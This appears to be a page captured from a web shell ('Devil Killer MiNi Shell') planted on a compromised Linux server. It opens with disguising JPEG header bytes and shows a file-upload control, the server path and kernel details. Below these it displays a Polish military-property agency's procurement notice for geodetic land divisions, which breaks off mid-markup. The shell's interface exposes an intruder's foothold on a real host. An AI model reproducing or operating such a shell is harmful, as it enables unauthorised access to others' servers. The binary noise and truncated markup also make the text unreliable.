JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210902/0016776001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie podziałów geodezyjnych w Zamościu , Kraśniku i Lublinie, nr referencyjny DZP-OL.2610.292.2021 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Agencja Mienia Wojskowego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 011263946</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowowiejska 26A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-911</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp.lu@amw.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://amw.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Agencja wykonawca </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie mieniem Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie podziałów geodezyjnych w Zamościu , Kraśniku i Lublinie, nr referencyjny DZP-OL.2610.292.2021 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-38d4e131-0bc9-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00167760</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001874/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Usługi geodezyjne - OR Lublin</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://amw.eb2b.com.pl/open-auctions.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone<br/>jestwjęzyku polskim.2. Komunikacja między Zamawiającym a Wykonawcami odbywa się<br/>wyłącznieprzyużyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy, za<br/>pośrednictwemelektronicznejplatformy zakupowej (dalej: „Platforma” lub „Platforma<br/>Zakupowa”)podadresem:https://amw.eb2b.com.pl, która spełnia wymagania opisane w art. 64 ustawy<br/>lub przyużyciupoczty elektronicznej (e-mail) na adres wskazany w Rozdziale I SWZ, za<br/>wyjątkiemprzypadkówwskazanych w SWZ. Oferty oraz oświadczenia i dokumenty składane wraz z<br/>ofertą należyskładać tylkoi wyłącznie przy użyciu Platformy. Strona<br/>internetowaprowadzonegopostępowaniahttps://amw.eb2b.com.pl/open-auctions.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego,musiposiadać konto na Platformie Zakupowej. Zarejestrowanie i utrzymywanie<br/>kontanaPlatformieZakupowej oraz korzystanie z Platformy jest bezpłatne.4. Wymagania<br/>techniczneiorganizacyjne korzystania z Platformy Zakupowej określa Regulamin Platformy<br/>Zakupowej(dostępnypod adresem internetowym https://amw.eb2b.com.pl/cms/page/id/terms-andconditions).<br/>Wykonawcaprzystępując do postępowania o udzielenie zamówienia publicznego tj.<br/>bezpłatnierejestrując się lublogując (w przypadku posiadania konta w Platformie Zakupowej), akceptuje<br/>warunkikorzystania zPlatformy, określone w Regulaminie oraz uznaje go za wiążący.5. Instrukcja<br/>korzystania zPlatformy:1)w zakładce „Postępowania”, dalej „Lista postępowań otwartych” wykonawca<br/>wybieraniniejszepostępowanie o nr DZP-OL.2610.292.2021 oraz korzystając z polecenia „Zgłoś się do<br/>udziałuwpostępowaniu” przechodzi odpowiednio do Formularza rejestracyjnego – w przypadku,kiedywykonawca nie posiada konta na Platformie, lub panelu logowania użytkownika do<br/>Systemuwprzypadku posiadania konta na Platformie;2) po wypełnieniu formularza<br/>rejestracyjnegowykonawcaotrzymuje wiadomość elektroniczną (e-mail) informującą, że może dokonać<br/>pierwszegologowaniadoPlatformy. Rejestracja nowego konta podlega weryfikacji i akceptacji<br/>Operatora, któramoże potrwaćdo 24h (8h roboczych).3) zgłoszenie do postępowania wymaga<br/>zalogowania WykonawcydoPlatformy.Po wprowadzeniu danych użytkownika tj. adresu e-mail oraz<br/>hasła zgłoszenie jestautomatycznie akceptowane przez Platformę;4) w zakładce „Załączniki”<br/>przedmiotowegopostępowaniadostępna jest dokumentacja postępowania (SWZ oraz pozostałe<br/>dokumenty). Pobraniedokumentunastępuje pokliknięciu na wybrany załącznik i wciśnięciu polecenia<br/>„Pobierz”. W celupobraniawszystkich załączników jednocześnie należy wybrać polecenie „Pobierz<br/>paczkę”, a następnie„Pobierzwszystkie załączniki organizatora”.5) Zakładka „Załączniki” służy również<br/>Wykonawcom dozłożeniaoferty orazdokumentów lub oświadczeń składanych razem z ofertą. 6) Za<br/>datę wpływuoferty,wniosków, zawiadomień, dokumentów, oświadczeń oraz innych informacji przyjmuje<br/>się datęichzamieszczenia na Platformie. 7) Zaleca się, aby Wykonawca na bieżąco<br/>śledził(sugerujemycodziennie) zmiany jakich w trakcie postępowania może dokonać Zamawiający.<br/>Zaleceniedotyczyrównież informacji jakieZamawiający kieruje do Wykonawców po zakończeniu<br/>składaniaofert.6.Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:1)<br/>stały dostępdosieci Internet o gwarantowanej przepustowości nie mniejszej niż 4/1 mb/s,2) komputer<br/>klasy PClubMac, o następującej konfiguracji: pamięć RAM min. 8 GB, procesor Intel IV 4GHz,<br/>jedenzsystemówoperacyjnych: MS Windows 7, Mac OS x 10.4, Linux, lub ich<br/>nowszewersje,3)zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku<br/>InternetExplorerminimalnie wersja 11.0.4) włączona obsługa JavaScript,5) zainstalowany<br/>programobsługującystosowane przez wykonawcęformaty plików (np. Acrobat Reader dla plików w<br/>formacie.pdf).7.Wszelkie dokumenty, oświadczenia, informacje składane za pośrednictwem Platformy,<br/>należywczytaćjako załączniki, według Instrukcji korzystania z Platformy, dostępnej dla<br/>zalogowanychużytkowników wzakładce „Pomoc” –„Instrukcje”.8. Dokumenty elektroniczne,<br/>oświadczenia lubelektroniczne kopiedokumentów lub oświadczeń składające się na ofertę (składane<br/>przez Wykonawcędo upływu terminuskładania ofert), przekazywane są na Platformę przy użyciu<br/>zakładki „Załączniki”.9.Dokumentyelektroniczne,oświadczenia, uzupełnienia, elektroniczne kopie<br/>dokumentów lub oświadczeńskładaneprzez Wykonawcę po terminie składania ofert (np. na wezwanie<br/>Zamawiającego), składane sąnaPlatformę przy użyciu zakładki „Pytania/informacje”Dalszy ciąg w<br/>sekcji IX-Pozostałe informacje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust.1 i<br/>2rozporządzeniaParlamentuEuropejskiego i Rady UE 2016/679 z 27 kwietnia 2016 r. w sprawie<br/>ochronyosóbfizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływutakichdanych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych-Dz.Urz.UEL119 z 04.05.2016, str.1),dalej RODO, informuję, że administratorem Pani/Pana<br/>danychosobowychjest że: administratorem Pani/Pana danych osobowych jest Agencja Mienia<br/>Wojskowego zsiedzibąprzy ul. Nowowiejskiej 26 A, 00-911 WarszawaAdministrator wyznaczył<br/>Inspektorem OchronyDanych,z którym może się Pani/Pankontaktować w sprawach związanych z<br/>ochrona danych poprzezpocztęelektroniczną na adres: iod@amw.com.pl lub listownie na adres Agencji<br/>Mienia Wojskowego,ul.Nowowiejska 26A, 00-911 Warszawa, z dopiskiem „Inspektor Ochrony<br/>Danych”;Pani/Panadaneosobowe przetwarzane będą napodstawie art. 6 ust.1 lit.c RODO w celu<br/>prowadzeniaprzedmiotowegopostępowania o udzielenie zamówienia publicznego oraz zawarcia<br/>umowy, apodstawą prawną ichprzetwarzania jest obowiązekprawny stosowania sformalizowanych<br/>procedurudzielania zamówieńpublicznych spoczywający naZamawiającym; Odbiorcami Pani/Pana<br/>danychosobowych będą osobylub podmioty, którym udostępniona zostanie dokumentacja postępowania woparciu o art. 18 oraz art.74 ustawy Pzp;Pani/Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp,przez okres4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia,a jeżeli czas trwaniaumowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwaniaumowy; Obowiązekpodania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Panadotyczących jest wymogiemustawowymokreślonym w przepisach<br/>ustawy Pzp, związanym z udziałemw postępowaniu o udzieleniezamówienia publicznego;<br/>konsekwencje niepodania określonych danychwynikają z ustawy Pzp; Wodniesieniu do Pani/a danych<br/>osobowych decyzje nie będą podejmowane wsposób zautomatyzowany,stosowanie do art. 22 RODO;<br/>Posiada Pan/i:•na podstawie art.15 RODOprawodostępu do danych osobowych Pani/a<br/>dotyczących;•na podstawie art.16 RODO prawodosprostowania lub uzupełnienia Pani/Pana danych<br/>osobowych, przy czym skorzystanie z prawadosprostowania lub uzupełnienia nie może skutkować<br/>zmianą wyniku postępowania oudzieleniezamówienia publicznego ani zmianąpostanowień umowy w<br/>zakresie niezgodnym z ustawąPzp oraznie może naruszać integralności protokołu oraz jego<br/>załączników.•na podstawie art.18 RODOprawożądania od administratora ograniczenia przetwarzania<br/>danych osobowych zzastrzeżeniemprzypadków, o których mowa w art.18 ust.2 RODO, przy czym<br/>prawo do ograniczeniaprzetwarzanianie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystaniaze środkówochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi naważnewzględy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego, a także nieograniczaprzetwarzania danych osobowych do czasu zakończenia<br/>postępowania oudzieleniezamówienia.•prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych,gdy uznaPani/Pan, że przetwarzanie danych osobowych Pani/a dotyczących<br/>narusza przepisyRODO;Nieprzysługuje Pani/u:•w związku z art.17 ust.3 lit.b,d lub eRODO prawo do<br/>usunięciadanychosobowych;•prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20RODO;•napodstawie art.21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyżpodstawąprawną przetwarzania Pani/Pana danych osobowych jest art.6<br/>ust.1lit.cRODO.JednocześnieZamawiający przypomina o ciążącym na Pani/u obowiązku<br/>informacyjnymwynikającym z art.14 RODOwzględem osób fizycznych, których dane przekazane<br/>zostanąZamawiającemu w związku zprowadzonym postępowaniem i które Zamawiający pośrednio<br/>pozyskaodwykonawcy biorącego udziałw postępowaniu, chyba że ma zastosowanie co najmniej jedno<br/>zwyłączeń, o których mowa w art.14ust.5 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/Pani: na podstawie<br/>art.18RODOprawożądania od administratora ograniczenia przetwarzania<br/>danychosobowychzzastrzeżeniemprzypadków, o których mowa w art. 18 ust. 2 RODO, przy czym<br/>prawodoograniczeniaprzetwarzanianie ma zastosowania w odniesieniu do przechowywania,<br/>wceluzapewnienia korzystaniaze środkówochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznejlubprawnej, lub z uwagi naważnewzględy interesu publicznego Unii Europejskiej<br/>lubpaństwaczłonkowskiego, a także nieograniczaprzetwarzania danych osobowych do<br/>czasuzakończeniapostępowania o udzieleniezamówienia. Nieprzysługuje Pani/Panu:w związku z art.<br/>17 ust.3 lit. b, d lube RODO prawo dousunięcia danychosobowych:prawo do przenoszenia<br/>danychosobowych, o którymmowa w art.20 RODO; na podstawie art. 21 RODO prawosprzeciwu,<br/>wobec przetwarzaniadanych osobowych,gdyż podstawąprawną przetwarzania Pani/Panadanych<br/>osobowych jest art. 6 ust.1 lit. c RODO.10.JednocześnieZamawiający przypomina o ciążącymna<br/>Pani/Panu obowiązkuinformacyjnymwynikającym z art. 14RODO względem osób fizycznych,których<br/>dane przekazanezostanąZamawiającemu w związku zprowadzonym postępowaniem i<br/>któreZamawiający pośredniopozyska odwykonawcy biorącego udziałw postępowaniu, chyba że<br/>mazastosowanie co najmniej jednozwyłączeń, o których mowa w art. 14ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP-OL.2610.292.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 Wykonanie podziału geodezyjnego nieruchomości:<br/>położonej w Zamościu , przy ul. Koszary 14a działka nr 1/58 o powierzchni 0,4520 ha (obręb 1 Miasto Zamość) – KW ZA1Z/00089281/6 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70100000-2 - Usługi w zakresie obsługi nieruchomości własnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wskazany w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 Wykonanie podziału geodezyjnego nieruchomości:<br/>- położonej w Zamościu , przy ul. Koszary działka nr 1/162 o powierzchni 0,6958 ha (obręb 0001 Miasto Zamość) – KW ZA1Z/00112258/7 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70100000-2 - Usługi w zakresie obsługi nieruchomości własnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wskazany w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3 Wykonanie podziału geodezyjnego nieruchomości:<br/>- położonej w Kraśniku , przy ul. Kolejowej (obręb 8 stacja kolejowa) działka nr 104/1 o powierzchni 17,1134 ha– KW LU1K/00002620/6 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70100000-2 - Usługi w zakresie obsługi nieruchomości własnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wskazany w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 4 Wykonanie podziału geodezyjnego nieruchomości:<br/>- położonej w Lublinie , przy ul. Spadochroniarzy (obręb 26 Rury Brygidkowskie) działka nr 4/2 o powierzchni 0,1689 ha– KW LU1/00172829/1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70100000-2 - Usługi w zakresie obsługi nieruchomości własnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 